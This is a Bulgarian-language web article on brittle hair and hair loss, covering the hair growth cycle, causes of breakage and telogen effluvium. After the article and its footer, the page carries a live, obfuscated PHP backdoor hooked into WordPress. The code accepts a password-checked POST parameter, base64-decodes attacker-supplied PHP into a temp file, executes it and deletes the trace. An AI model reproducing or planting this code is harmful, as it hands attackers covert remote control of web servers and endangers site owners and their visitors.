Чуплива коса и косопад | Косопад

Чуплива коса и косопад

Чупливата коса и косопада са два процеса, които могат да причинят анормална загуба на косата и да допринесат до отслабването на косата или оплешивяване. Чупенето може да се появи по различни причини, свързани основно с фризьорските процедури.

chupliva-kosa

ОСНОВНОТО ЗА ЧУПЛИВАТА КОСА
Косата се чупи, което отделни нишки се сгъстяват или отслабват. Понякога се чупи близо до кожата и спира нормалния растеж на косата. В други случаи, дългата коса се чупи на връхчетата, като така се получават цъфналите връхчета. С времето отварянето на връхчетата продължава още по- дълбоко, като засяга косъма.

ЦИКЪЛ НА ЖИВОТ НА КОСАТА
Близо 90% от косата се намира в анагенната фаза, т.е., активен растеж. Косопадът може да се

Счупен косъм от близо

Счупен косъм от близо

дължи на нормални процеси като телогенната фаза на живот на косата, т.е., пада от само себе си. Нормално губим между 50 и 100 косъма на ден, като част от нормалния живот на косата.

ПРИЧИНИ ЗА ЧУПЛИВОСТТА
Може да причините чупене на косата, ако често се боядисвате. Също така, заради честата или лошата употреба на гелове, спрейове и пр. Използването на някои аксесоари за коса като сешоар, преса или фиби. Прекалено честото миене на коса или неправилното ресане също могат да доведат до чупене.

АНОРМАЛНО ПАДАНЕ НА КОСАТА
Косопадът обикновено е причинен, защото голяма част от косата влиза в телогенна фаза. Процесът е известен като телогенен ефлувиум. Той може да е причинен от хронични заболявания, тежки инфекции или причини за грип, треска, липса на протеини, дефицит на желязо, заболяване на щитовидната жлеза и пр.

Може да ограничите чупенето на косата като я решите само суха. Телогенният ефлувиум обикновено причинява оплешивяване. Процесът обаче може да се обърне, ако се излекувате от заболяването или намалите стреса.

16. март 2014 20:14:38 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}